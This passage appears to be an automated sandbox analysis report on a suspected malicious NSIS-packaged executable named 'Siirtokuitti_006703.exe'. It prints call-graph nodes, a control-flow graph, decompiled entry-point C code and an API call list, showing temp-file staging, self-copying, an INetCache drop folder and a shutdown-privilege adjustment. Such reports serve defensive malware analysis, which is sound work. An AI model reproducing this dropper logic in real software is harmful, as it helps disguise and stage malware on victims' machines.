26523->26515 26525 404fee 26525->26495 26526->26518 26528 40522f SendMessageW 26526->26528 26527->26504 26529 405321 26527->26529 26528->26518 26537 404c99 20 API calls 26529->26537 26530->26532 26532->26518 26533->26525 26534->26487 26535->26514 26536->26526 26537->26504 26538->26501 26539 40167b 26540 402c37 17 API calls 26539->26540 26541 401682 26540->26541 26542 402c37 17 API calls 26541->26542 26543 40168b 26542->26543 26544 402c37 17 API calls 26543->26544 26545 401694 MoveFileW 26544->26545 26546 4016a0 26545->26546 26547 4016a7 26545->26547 26549 401423 24 API calls 26546->26549 26548 4066f3 2 API calls 26547->26548 26551 40224a 26547->26551 26550 4016b6 26548->26550 26549->26551 26550->26551 26553 406176 36 API calls 26550->26553 26553->26546 26554 40175c 26555 402c37 17 API calls 26554->26555 26556 401763 26555->26556 26557 405ed1 2 API calls 26556->26557 26558 40176a 26557->26558 26559 405ed1 2 API calls 26558->26559 26559->26558 26560 40247e 26571 402c77 26560->26571 26563 402c37 17 API calls 26564 402491 26563->26564 26565 40249c RegQueryValueExW 26564->26565 26566 402885 26564->26566 26567 4024bc 26565->26567 26568 4024c2 RegCloseKey 26565->26568 26567->26568 26576 4062f7 wsprintfW 26567->26576 26568->26566 26572 402c37 17 API calls 26571->26572 26573 402c8e 26572->26573 26574 40621d RegOpenKeyExW 26573->26574 26575 402488 26574->26575 26575->26563 26576->26568 26577 4023de 26578 402c37 17 API calls 26577->26578 26579 4023f0 26578->26579 26580 402c37 17 API calls 26579->26580 26581 4023fa 26580->26581 26594 402cc7 26581->26594 26584 402abf 26585 402432 26587 40243e 26585->26587 26590 402c15 17 API calls 26585->26590 26586 402c37 17 API calls 26589 402428 lstrlenW 26586->26589 26588 40245d RegSetValueExW 26587->26588 26591 4031ba 44 API calls 26587->26591 26592 402473 RegCloseKey 26588->26592 26589->26585 26590->26587 26591->26588 26592->26584 26595 402ce2 26594->26595 26598 40624b 26595->26598 26599 40625a 26598->26599 26600 406265 RegCreateKeyExW 26599->26600 26601 40240a 26599->26601 26600->26601 26601->26584 26601->26585 26601->26586

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 0 403489-4034c6 SetErrorMode GetVersion 1 4034c8-4034d0 call 40678a 0->1 2 4034d9 0->2 1->2 8 4034d2 1->8 4 4034de-4034f2 call 40671a lstrlenA 2->4 9 4034f4-403510 call 40678a * 3 4->9 8->2 16 403521-403582 #17 OleInitialize SHGetFileInfoW call 4063b0 GetCommandLineW call 4063b0 GetModuleHandleW 9->16 17 403512-403518 9->17 24 403584-40358b 16->24 25 40358c-4035a6 call 405cae CharNextW 16->25 17->16 21 40351a 17->21 21->16 24->25 28 4035ac-4035b2 25->28 29 4036bd-4036d7 GetTempPathW call 403458 25->29 30 4035b4-4035b9 28->30 31 4035bb-4035bf 28->31 36 4036d9-4036f7 GetWindowsDirectoryW lstrcatW call 403458 29->36 37 40372f-403749 DeleteFileW call 402f14 29->37 30->30 30->31 34 4035c1-4035c5 31->34 35 4035c6-4035ca 31->35 34->35 38 4035d0-4035d6 35->38 39 403689-403696 call 405cae 35->39 36->37 53 4036f9-403729 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403458 36->53 57 4037fa-40380a call 4039cc OleUninitialize 37->57 58 40374f-403755 37->58 43 4035f1-40362a 38->43 44 4035d8-4035e0 38->44 55 403698-403699 39->55 56 40369a-4036a0 39->56 50 403647-403681 43->50 51 40362c-403631 43->51 48 4035e2-4035e5 44->48 49 4035e7 44->49 48->43 48->49 49->43 50->39 54 403683-403687 50->54 51->50 52 403633-40363b 51->52 60 403642 52->60 61 40363d-403640 52->61 53->37 53->57 54->39 63 4036a8-4036b6 call 4063b0 54->63 55->56 56->28 64 4036a6 56->64 73 403930-403936 57->73 74 403810-403820 call 405a12 ExitProcess 57->74 65 4037ea-4037f1 call 403abe 58->65 66 40375b-403766 call 405cae 58->66 60->50 61->50 61->60 69 4036bb 63->69 64->69 76 4037f6 65->76 80 4037b4-4037be 66->80 81 403768-40379d 66->81 69->29 78 4039b4-4039bc 73->78 79 403938-40394e GetCurrentProcess OpenProcessToken 73->79 76->57 82 4039c2-4039c6 ExitProcess 78->82 83 4039be 78->83 87 403950-40397e LookupPrivilegeValueW AdjustTokenPrivileges 79->87 88 403984-403992 call 40678a 79->88 85 4037c0-4037ce call 405d89 80->85 86 403826-40383a call 40597d lstrcatW 80->86 89 40379f-4037a3 81->89 83->82 85->57 99 4037d0-4037e6 call 4063b0 * 2 85->99 100 403847-403861 lstrcatW lstrcmpiW 86->100 101 40383c-403842 lstrcatW 86->101 87->88 102 4039a0-4039ab ExitWindowsEx 88->102 103 403994-40399e 88->103 90 4037a5-4037aa 89->90 91 4037ac-4037b0 89->91 90->91 95 4037b2 90->95 91->89 91->95 95->80 99->65 100->57 106 403863-403866 100->106 101->100 102->78 104 4039ad-4039af call 40140b 102->104 103->102 103->104 104->78 109 403868-40386d call 4058e3 106->109 110 40386f call 405960 106->110 115 403874-403882 SetCurrentDirectoryW 109->115 110->115 118 403884-40388a call 4063b0 115->118 119 40388f-4038b8 call 4063b0 115->119 118->119 123 4038bd-4038d9 call 4063d2 DeleteFileW 119->123 126 40391a-403922 123->126 127 4038db-4038eb CopyFileW 123->127 126->123 128 403924-40392b call 406176 126->128 127->126 129 4038ed-40390d call 406176 call 4063d2 call 405995 127->129 128->57 129->126 138 40390f-403916 CloseHandle 129->138 138->126
                                                                                                                      C-Code - Quality: 81%
                                                                                                                      			_entry_() {
                                                                                                                      				signed int _t51;
                                                                                                                      				intOrPtr* _t56;
                                                                                                                      				WCHAR* _t60;
                                                                                                                      				char* _t63;
                                                                                                                      				void* _t66;
                                                                                                                      				void* _t68;
                                                                                                                      				int _t70;
                                                                                                                      				int _t72;
                                                                                                                      				int _t75;
                                                                                                                      				intOrPtr* _t76;
                                                                                                                      				int _t77;
                                                                                                                      				int _t79;
                                                                                                                      				void* _t103;
                                                                                                                      				signed int _t120;
                                                                                                                      				void* _t123;
                                                                                                                      				void* _t128;
                                                                                                                      				intOrPtr _t147;
                                                                                                                      				intOrPtr _t148;
                                                                                                                      				intOrPtr* _t149;
                                                                                                                      				int _t151;
                                                                                                                      				void* _t154;
                                                                                                                      				int _t155;
                                                                                                                      				signed int _t159;
                                                                                                                      				signed int _t164;
                                                                                                                      				signed int _t169;
                                                                                                                      				void* _t171;
                                                                                                                      				WCHAR* _t172;
                                                                                                                      				signed int _t175;
                                                                                                                      				signed int _t178;
                                                                                                                      				CHAR* _t179;
                                                                                                                      				void* _t182;
                                                                                                                      				int* _t184;
                                                                                                                      				void* _t192;
                                                                                                                      				char* _t193;
                                                                                                                      				void* _t196;
                                                                                                                      				void* _t197;
                                                                                                                      				void* _t243;
                                                                                                                      
                                                                                                                      				_t171 = 0x20;
                                                                                                                      				_t151 = 0;
                                                                                                                      				 *(_t197 + 0x14) = 0;
                                                                                                                      				 *(_t197 + 0x10) = L"Error writing temporary file. Make sure your temp folder is valid.";
                                                                                                                      				 *(_t197 + 0x1c) = 0;
                                                                                                                      				SetErrorMode(0x8001); // executed
                                                                                                                      				_t51 = GetVersion() & 0xbfffffff;
                                                                                                                      				 *0x42a24c = _t51;
                                                                                                                      				if(_t51 != 6) {
                                                                                                                      					_t149 = E0040678A(0);
                                                                                                                      					if(_t149 != 0) {
                                                                                                                      						 *_t149(0xc00);
                                                                                                                      					}
                                                                                                                      				}
                                                                                                                      				_t179 = "UXTHEME";
                                                                                                                      				goto L4;
                                                                                                                      				L8:
                                                                                                                      				__imp__#17(_t192);
                                                                                                                      				__imp__OleInitialize(_t151); // executed
                                                                                                                      				 *0x42a318 = _t56;
                                                                                                                      				SHGetFileInfoW(0x4216e8, _t151, _t197 + 0x34, 0x2b4, _t151); // executed
                                                                                                                      				E004063B0(0x429240, L"NSIS Error");
                                                                                                                      				_t60 = GetCommandLineW();
                                                                                                                      				_t193 = L"\"C:\\Users\\Arthur\\Desktop\\Siirtokuitti_006703.exe\"";
                                                                                                                      				E004063B0(_t193, _t60);
                                                                                                                      				 *0x42a240 = GetModuleHandleW(_t151);
                                                                                                                      				_t63 = _t193;
                                                                                                                      				if(L"\"C:\\Users\\Arthur\\Desktop\\Siirtokuitti_006703.exe\"" == 0x22) {
                                                                                                                      					_t63 =  &M00435002;
                                                                                                                      					_t171 = 0x22;
                                                                                                                      				}
                                                                                                                      				_t155 = CharNextW(E00405CAE(_t63, _t171));
                                                                                                                      				 *(_t197 + 0x18) = _t155;
                                                                                                                      				_t66 =  *_t155;
                                                                                                                      				if(_t66 == _t151) {
                                                                                                                      					L33:
                                                                                                                      					_t172 = L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\";
                                                                                                                      					GetTempPathW(0x400, _t172);
                                                                                                                      					_t68 = E00403458(_t155, 0);
                                                                                                                      					_t225 = _t68;
                                                                                                                      					if(_t68 != 0) {
                                                                                                                      						L36:
                                                                                                                      						DeleteFileW(L"1033"); // executed
                                                                                                                      						_t70 = E00402F14(_t227,  *(_t197 + 0x1c)); // executed
                                                                                                                      						 *(_t197 + 0x10) = _t70;
                                                                                                                      						if(_t70 != _t151) {
                                                                                                                      							L48:
                                                                                                                      							E004039CC();
                                                                                                                      							__imp__OleUninitialize();
                                                                                                                      							_t239 =  *(_t197 + 0x10) - _t151;
                                                                                                                      							if( *(_t197 + 0x10) == _t151) {
                                                                                                                      								__eflags =  *0x42a2f4 - _t151;
                                                                                                                      								if( *0x42a2f4 == _t151) {
                                                                                                                      									L72:
                                                                                                                      									_t72 =  *0x42a30c;
                                                                                                                      									__eflags = _t72 - 0xffffffff;
                                                                                                                      									if(_t72 != 0xffffffff) {
                                                                                                                      										 *(_t197 + 0x10) = _t72;
                                                                                                                      									}
                                                                                                                      									ExitProcess( *(_t197 + 0x10));
                                                                                                                      								}
                                                                                                                      								_t75 = OpenProcessToken(GetCurrentProcess(), 0x28, _t197 + 0x14);
                                                                                                                      								__eflags = _t75;
                                                                                                                      								if(_t75 != 0) {
                                                                                                                      									LookupPrivilegeValueW(_t151, L"SeShutdownPrivilege", _t197 + 0x20);
                                                                                                                      									 *(_t197 + 0x34) = 1;
                                                                                                                      									 *(_t197 + 0x40) = 2;
                                                                                                                      									AdjustTokenPrivileges( *(_t197 + 0x28), _t151, _t197 + 0x24, _t151, _t151, _t151);
                                                                                                                      								}
                                                                                                                      								_t76 = E0040678A(4);
                                                                                                                      								__eflags = _t76 - _t151;
                                                                                                                      								if(_t76 == _t151) {
                                                                                                                      									L70:
                                                                                                                      									_t77 = ExitWindowsEx(2, 0x80040002);
                                                                                                                      									__eflags = _t77;
                                                                                                                      									if(_t77 != 0) {
                                                                                                                      										goto L72;
                                                                                                                      									}
                                                                                                                      									goto L71;
                                                                                                                      								} else {
                                                                                                                      									_t79 =  *_t76(_t151, _t151, _t151, 0x25, 0x80040002);
                                                                                                                      									__eflags = _t79;
                                                                                                                      									if(_t79 == 0) {
                                                                                                                      										L71:
                                                                                                                      										E0040140B(9);
                                                                                                                      										goto L72;
                                                                                                                      									}
                                                                                                                      									goto L70;
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      							E00405A12( *(_t197 + 0x10), 0x200010);
                                                                                                                      							ExitProcess(2);
                                                                                                                      						}
                                                                                                                      						if( *0x42a260 == _t151) {
                                                                                                                      							L47:
                                                                                                                      							 *0x42a30c =  *0x42a30c | 0xffffffff;
                                                                                                                      							 *(_t197 + 0x14) = E00403ABE( *0x42a30c);
                                                                                                                      							goto L48;
                                                                                                                      						}
                                                                                                                      						_t184 = E00405CAE(_t193, _t151);
                                                                                                                      						if(_t184 < _t193) {
                                                                                                                      							L44:
                                                                                                                      							_t236 = _t184 - _t193;
                                                                                                                      							 *(_t197 + 0x10) = L"Error launching installer";
                                                                                                                      							if(_t184 < _t193) {
                                                                                                                      								_t182 = E0040597D(_t239);
                                                                                                                      								lstrcatW(_t172, L"~nsu");
                                                                                                                      								if(_t182 != _t151) {
                                                                                                                      									lstrcatW(_t172, "A");
                                                                                                                      								}
                                                                                                                      								lstrcatW(_t172, L".tmp");
                                                                                                                      								_t195 = L"C:\\Users\\Arthur\\Desktop";
                                                                                                                      								if(lstrcmpiW(_t172, L"C:\\Users\\Arthur\\Desktop") != 0) {
                                                                                                                      									_push(_t172);
                                                                                                                      									if(_t182 == _t151) {
                                                                                                                      										E00405960();
                                                                                                                      									} else {
                                                                                                                      										E004058E3();
                                                                                                                      									}
                                                                                                                      									SetCurrentDirectoryW(_t172);
                                                                                                                      									_t243 = L"C:\\Users\\Arthur\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Standpost" - _t151; // 0x43
                                                                                                                      									if(_t243 == 0) {
                                                                                                                      										E004063B0(L"C:\\Users\\Arthur\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Standpost", _t195);
                                                                                                                      									}
                                                                                                                      									E004063B0(0x42b000,  *(_t197 + 0x18));
                                                                                                                      									_t156 = "A" & 0x0000ffff;
                                                                                                                      									 *0x42b800 = ( *0x40a316 & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
                                                                                                                      									_t196 = 0x1a;
                                                                                                                      									do {
                                                                                                                      										E004063D2(_t151, _t172, 0x420ee8, 0x420ee8,  *((intOrPtr*)( *0x42a254 + 0x120)));
                                                                                                                      										DeleteFileW(0x420ee8);
                                                                                                                      										if( *(_t197 + 0x10) != _t151 && CopyFileW(L"C:\\Users\\Arthur\\Desktop\\Siirtokuitti_006703.exe", 0x420ee8, ?str?) != 0) {
                                                                                                                      											E00406176(_t156, 0x420ee8, _t151);
                                                                                                                      											E004063D2(_t151, _t172, 0x420ee8, 0x420ee8,  *((intOrPtr*)( *0x42a254 + 0x124)));
                                                                                                                      											_t103 = E00405995(0x420ee8);
                                                                                                                      											if(_t103 != _t151) {
                                                                                                                      												CloseHandle(_t103);
                                                                                                                      												 *(_t197 + 0x10) = _t151;
                                                                                                                      											}
                                                                                                                      										}
                                                                                                                      										 *0x42b800 =  *0x42b800 + 1;
                                                                                                                      										_t196 = _t196 - 1;
                                                                                                                      									} while (_t196 != 0);
                                                                                                                      									E00406176(_t156, _t172, _t151);
                                                                                                                      								}
                                                                                                                      								goto L48;
                                                                                                                      							}
                                                                                                                      							 *_t184 = _t151;
                                                                                                                      							_t185 =  &(_t184[2]);
                                                                                                                      							if(E00405D89(_t236,  &(_t184[2])) == 0) {
                                                                                                                      								goto L48;
                                                                                                                      							}
                                                                                                                      							E004063B0(L"C:\\Users\\Arthur\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Standpost", _t185);
                                                                                                                      							E004063B0(L"C:\\Users\\Arthur\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Standpost\\mos\\Ensileringen", _t185);
                                                                                                                      							 *(_t197 + 0x10) = _t151;
                                                                                                                      							goto L47;
                                                                                                                      						}
                                                                                                                      						asm("cdq");
                                                                                                                      						asm("cdq");
                                                                                                                      						asm("cdq");
                                                                                                                      						_t159 = ( *0x40a33a & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
                                                                                                                      						_t120 = ( *0x40a33e & 0x0000ffff) << 0x00000010 |  *0x40a33c & 0x0000ffff | (_t164 << 0x00000020 |  *0x40a33e & 0x0000ffff) << 0x10;
                                                                                                                      						while( *_t184 != _t159 || _t184[1] != _t120) {
                                                                                                                      							_t184 = _t184;
                                                                                                                      							if(_t184 >= _t193) {
                                                                                                                      								continue;
                                                                                                                      							}
                                                                                                                      							break;
                                                                                                                      						}
                                                                                                                      						_t151 = 0;
                                                                                                                      						goto L44;
                                                                                                                      					}
                                                                                                                      					GetWindowsDirectoryW(_t172, 0x3fb);
                                                                                                                      					lstrcatW(_t172, L"\\Temp");
                                                                                                                      					_t123 = E00403458(_t155, _t225);
                                                                                                                      					_t226 = _t123;
                                                                                                                      					if(_t123 != 0) {
                                                                                                                      						goto L36;
                                                                                                                      					}
                                                                                                                      					GetTempPathW(0x3fc, _t172);
                                                                                                                      					lstrcatW(_t172, L"Low");
                                                                                                                      					SetEnvironmentVariableW(L"TEMP", _t172);
                                                                                                                      					SetEnvironmentVariableW(L"TMP", _t172);
                                                                                                                      					_t128 = E00403458(_t155, _t226);
                                                                                                                      					_t227 = _t128;
                                                                                                                      					if(_t128 == 0) {
                                                                                                                      						goto L48;
                                                                                                                      					}
                                                                                                                      					goto L36;
                                                                                                                      				} else {
                                                                                                                      					do {
                                                                                                                      						_t154 = 0x20;
                                                                                                                      						if(_t66 != _t154) {
                                                                                                                      							L13:
                                                                                                                      							if( *_t155 == 0x22) {
                                                                                                                      								_t155 = _t155 + 2;
                                                                                                                      								_t154 = 0x22;
                                                                                                                      							}
                                                                                                                      							if( *_t155 != 0x2f) {
                                                                                                                      								goto L27;
                                                                                                                      							} else {
                                                                                                                      								_t155 = _t155 + 2;
                                                                                                                      								if( *_t155 == 0x53) {
                                                                                                                      									_t148 =  *((intOrPtr*)(_t155 + 2));
                                                                                                                      									if(_t148 == 0x20 || _t148 == 0) {
                                                                                                                      										 *0x42a300 = 1;
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      								asm("cdq");
                                                                                                                      								asm("cdq");
                                                                                                                      								_t169 = L"NCRC" & 0x0000ffff;
                                                                                                                      								asm("cdq");
                                                                                                                      								_t175 = ( *0x40a37e & 0x0000ffff) << 0x00000010 |  *0x40a37c & 0x0000ffff | _t169;
                                                                                                                      								if( *_t155 == (( *0x40a37a & 0x0000ffff) << 0x00000010 | _t169) &&  *((intOrPtr*)(_t155 + 4)) == _t175) {
                                                                                                                      									_t147 =  *((intOrPtr*)(_t155 + 8));
                                                                                                                      									if(_t147 == 0x20 || _t147 == 0) {
                                                                                                                      										 *(_t197 + 0x1c) =  *(_t197 + 0x1c) | 0x00000004;
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      								asm("cdq");
                                                                                                                      								asm("cdq");
                                                                                                                      								_t164 = L" /D=" & 0x0000ffff;
                                                                                                                      								asm("cdq");
                                                                                                                      								_t178 = ( *0x40a372 & 0x0000ffff) << 0x00000010 |  *0x40a370 & 0x0000ffff | _t164;
                                                                                                                      								if( *(_t155 - 4) != (( *0x40a36e & 0x0000ffff) << 0x00000010 | _t164) ||  *_t155 != _t178) {
                                                                                                                      									goto L27;
                                                                                                                      								} else {
                                                                                                                      									 *(_t155 - 4) =  *(_t155 - 4) & 0x00000000;
                                                                                                                      									__eflags = _t155;
                                                                                                                      									E004063B0(L"C:\\Users\\Arthur\\AppData\\Local\\Microsoft\\Windows\\INetCache\\Standpost", _t155);
                                                                                                                      									L32:
                                                                                                                      									_t151 = 0;
                                                                                                                      									goto L33;
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						} else {
                                                                                                                      							goto L12;
                                                                                                                      						}
                                                                                                                      						do {
                                                                                                                      							L12:
                                                                                                                      							_t155 = _t155 + 2;
                                                                                                                      						} while ( *_t155 == _t154);
                                                                                                                      						goto L13;
                                                                                                                      						L27:
                                                                                                                      						_t155 = E00405CAE(_t155, _t154);
                                                                                                                      						if( *_t155 == 0x22) {
                                                                                                                      							_t155 = _t155 + 2;
                                                                                                                      						}
                                                                                                                      						_t66 =  *_t155;
                                                                                                                      					} while (_t66 != 0);
                                                                                                                      					goto L32;
                                                                                                                      				}
                                                                                                                      				L4:
                                                                                                                      				E0040671A(_t179); // executed
                                                                                                                      				_t179 =  &(_t179[lstrlenA(_t179) + 1]);
                                                                                                                      				if( *_t179 != 0) {
                                                                                                                      					goto L4;
                                                                                                                      				} else {
                                                                                                                      					E0040678A(0xa);
                                                                                                                      					 *0x42a244 = E0040678A(8);
                                                                                                                      					_t56 = E0040678A(6);
                                                                                                                      					if(_t56 != _t151) {
                                                                                                                      						_t56 =  *_t56(0x1e);
                                                                                                                      						if(_t56 != 0) {
                                                                                                                      							 *0x42a24f =  *0x42a24f | 0x00000040;
                                                                                                                      						}
                                                                                                                      					}
                                                                                                                      					goto L8;
                                                                                                                      				}
                                                                                                                      			}








































                                                                                                                      0x00403494
                                                                                                                      0x00403495
                                                                                                                      0x0040349c
                                                                                                                      0x004034a0
                                                                                                                      0x004034a8
                                                                                                                      0x004034ac
                                                                                                                      0x004034b8
                                                                                                                      0x004034c1
                                                                                                                      0x004034c6
                                                                                                                      0x004034c9
                                                                                                                      0x004034d0
                                                                                                                      0x004034d7
                                                                                                                      0x004034d7
                                                                                                                      0x004034d0
                                                                                                                      0x004034d9
                                                                                                                      0x004034d9
                                                                                                                      0x00403521
                                                                                                                      0x00403522
                                                                                                                      0x00403529
                                                                                                                      0x0040352f
                                                                                                                      0x00403545
                                                                                                                      0x00403555
                                                                                                                      0x0040355a
                                                                                                                      0x00403560
                                                                                                                      0x00403567
                                                                                                                      0x0040357b
                                                                                                                      0x00403580
                                                                                                                      0x00403582
                                                                                                                      0x00403586
                                                                                                                      0x0040358b
                                                                                                                      0x0040358b
                                                                                                                      0x0040359a
                                                                                                                      0x0040359c
                                                                                                                      0x004035a0
                                                                                                                      0x004035a6
                                                                                                                      0x004036bd
                                                                                                                      0x004036c3
                                                                                                                      0x004036ce
                                                                                                                      0x004036d0
                                                                                                                      0x004036d5
                                                                                                                      0x004036d7
                                                                                                                      0x0040372f
                                                                                                                      0x00403734
                                                                                                                      0x0040373e
                                                                                                                      0x00403745
                                                                                                                      0x00403749
                                                                                                                      0x004037fa
                                                                                                                      0x004037fa
                                                                                                                      0x004037ff
                                                                                                                      0x00403805
                                                                                                                      0x0040380a
                                                                                                                      0x00403930
                                                                                                                      0x00403936
                                                                                                                      0x004039b4
                                                                                                                      0x004039b4
                                                                                                                      0x004039b9
                                                                                                                      0x004039bc
                                                                                                                      0x004039be
                                                                                                                      0x004039be
                                                                                                                      0x004039c6
                                                                                                                      0x004039c6
                                                                                                                      0x00403946
                                                                                                                      0x0040394c
                                                                                                                      0x0040394e
                                                                                                                      0x0040395b
                                                                                                                      0x0040396e
                                                                                                                      0x00403976
                                                                                                                      0x0040397e
                                                                                                                      0x0040397e
                                                                                                                      0x00403986
                                                                                                                      0x0040398b
                                                                                                                      0x00403992
                                                                                                                      0x004039a0
                                                                                                                      0x004039a3
                                                                                                                      0x004039a9
                                                                                                                      0x004039ab
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00403994
                                                                                                                      0x0040399a
                                                                                                                      0x0040399c
                                                                                                                      0x0040399e
                                                                                                                      0x004039ad
                                                                                                                      0x004039af
                                                                                                                      0x00000000
                                                                                                                      0x004039af
                                                                                                                      0x00000000
                                                                                                                      0x0040399e
                                                                                                                      0x00403992
                                                                                                                      0x00403819
                                                                                                                      0x00403820
                                                                                                                      0x00403820
                                                                                                                      0x00403755
                                                                                                                      0x004037ea
                                                                                                                      0x004037ea
                                                                                                                      0x004037f6
                                                                                                                      0x00000000
                                                                                                                      0x004037f6
                                                                                                                      0x00403762
                                                                                                                      0x00403766
                                                                                                                      0x004037b4
                                                                                                                      0x004037b4
                                                                                                                      0x004037b6
                                                                                                                      0x004037be
                                                                                                                      0x00403831
                                                                                                                      0x00403833
                                                                                                                      0x0040383a
                                                                                                                      0x00403842
                                                                                                                      0x00403842
                                                                                                                      0x0040384d
                                                                                                                      0x00403852
                                                                                                                      0x00403861
                                                                                                                      0x00403865
                                                                                                                      0x00403866
                                                                                                                      0x0040386f
                                                                                                                      0x00403868
                                                                                                                      0x00403868
                                                                                                                      0x00403868
                                                                                                                      0x00403875
                                                                                                                      0x0040387b
                                                                                                                      0x00403882
                                                                                                                      0x0040388a
                                                                                                                      0x0040388a
                                                                                                                      0x00403898
                                                                                                                      0x004038a4
                                                                                                                      0x004038b2
                                                                                                                      0x004038b7
                                                                                                                      0x004038bd
                                                                                                                      0x004038c9
                                                                                                                      0x004038cf
                                                                                                                      0x004038d9
                                                                                                                      0x004038ef
                                                                                                                      0x00403900
                                                                                                                      0x00403906
                                                                                                                      0x0040390d
                                                                                                                      0x00403910
                                                                                                                      0x00403916
                                                                                                                      0x00403916
                                                                                                                      0x0040390d
                                                                                                                      0x0040391a
                                                                                                                      0x00403921
                                                                                                                      0x00403921
                                                                                                                      0x00403926
                                                                                                                      0x00403926
                                                                                                                      0x00000000
                                                                                                                      0x00403861
                                                                                                                      0x004037c0
                                                                                                                      0x004037c3
                                                                                                                      0x004037ce
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x004037d6
                                                                                                                      0x004037e1
                                                                                                                      0x004037e6
                                                                                                                      0x00000000
                                                                                                                      0x004037e6
                                                                                                                      0x0040376f
                                                                                                                      0x00403787
                                                                                                                      0x00403798
                                                                                                                      0x00403799
                                                                                                                      0x0040379d
                                                                                                                      0x0040379f
                                                                                                                      0x004037ad
                                                                                                                      0x004037b0
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x004037b0
                                                                                                                      0x004037b2
                                                                                                                      0x00000000
                                                                                                                      0x004037b2
                                                                                                                      0x004036df
                                                                                                                      0x004036eb
                                                                                                                      0x004036f0
                                                                                                                      0x004036f5
                                                                                                                      0x004036f7
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x004036ff
                                                                                                                      0x00403707
                                                                                                                      0x00403718
                                                                                                                      0x00403720
                                                                                                                      0x00403722
                                                                                                                      0x00403727
                                                                                                                      0x00403729
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x004035ac
                                                                                                                      0x004035ac
                                                                                                                      0x004035ae
                                                                                                                      0x004035b2
                                                                                                                      0x004035bb
                                                                                                                      0x004035bf
                                                                                                                      0x004035c4
                                                                                                                      0x004035c5
                                                                                                                      0x004035c5
                                                                                                                      0x004035ca
                                                                                                                      0x00000000
                                                                                                                      0x004035d0
                                                                                                                      0x004035d1
                                                                                                                      0x004035d6
                                                                                                                      0x004035d8
                                                                                                                      0x004035e0
                                                                                                                      0x004035e7
                                                                                                                      0x004035e7
                                                                                                                      0x004035e0
                                                                                                                      0x004035f8
                                                                                                                      0x0040360b
                                                                                                                      0x0040360c
                                                                                                                      0x00403621
                                                                                                                      0x00403626
                                                                                                                      0x0040362a
                                                                                                                      0x00403633
                                                                                                                      0x0040363b
                                                                                                                      0x00403642
                                                                                                                      0x00403642
                                                                                                                      0x0040363b
                                                                                                                      0x0040364e
                                                                                                                      0x00403661
                                                                                                                      0x00403662
                                                                                                                      0x00403677
                                                                                                                      0x0040367d
                                                                                                                      0x00403681
                                                                                                                      0x00000000
                                                                                                                      0x004036a8
                                                                                                                      0x004036a8
                                                                                                                      0x004036ad
                                                                                                                      0x004036b6
                                                                                                                      0x004036bb
                                                                                                                      0x004036bb
                                                                                                                      0x00000000
                                                                                                                      0x004036bb
                                                                                                                      0x00403681
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x004035b4
                                                                                                                      0x004035b4
                                                                                                                      0x004035b5
                                                                                                                      0x004035b6
                                                                                                                      0x00000000
                                                                                                                      0x00403689
                                                                                                                      0x00403690
                                                                                                                      0x00403696
                                                                                                                      0x00403699
                                                                                                                      0x00403699
                                                                                                                      0x0040369a
                                                                                                                      0x0040369d
                                                                                                                      0x00000000
                                                                                                                      0x004036a6
                                                                                                                      0x004034de
                                                                                                                      0x004034df
                                                                                                                      0x004034eb
                                                                                                                      0x004034f2
                                                                                                                      0x00000000
                                                                                                                      0x004034f4
                                                                                                                      0x004034f6
                                                                                                                      0x00403504
                                                                                                                      0x00403509
                                                                                                                      0x00403510
                                                                                                                      0x00403514
                                                                                                                      0x00403518
                                                                                                                      0x0040351a
                                                                                                                      0x0040351a
                                                                                                                      0x00403518
                                                                                                                      0x00000000
                                                                                                                      0x00403510

                                                                                                                      APIs
                                                                                                                      • SetErrorMode.KERNELBASE ref: 004034AC
                                                                                                                      • GetVersion.KERNEL32 ref: 004034B2
                                                                                                                      • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004034E5
                                                                                                                      • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 00403522
                                                                                                                      • OleInitialize.OLE32(00000000), ref: 00403529
                                                                                                                      • SHGetFileInfoW.SHELL32(004216E8,00000000,?,000002B4,00000000), ref: 00403545
                                                                                                                      • GetCommandLineW.KERNEL32(00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 0040355A
                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\Siirtokuitti_006703.exe",00000000,?,00000006,00000008,0000000A), ref: 0040356D
                                                                                                                      • CharNextW.USER32(00000000,"C:\Users\user\Desktop\Siirtokuitti_006703.exe",00000020,?,00000006,00000008,0000000A), ref: 00403594
                                                                                                                        • Part of subcall function 0040678A: GetModuleHandleA.KERNEL32(?,00000020,?,004034FB,0000000A), ref: 0040679C
                                                                                                                        • Part of subcall function 0040678A: GetProcAddress.KERNEL32(00000000,?), ref: 004067B7
                                                                                                                      • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 004036CE
                                                                                                                      • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 004036DF
                                                                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004036EB
                                                                                                                      • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004036FF
                                                                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403707
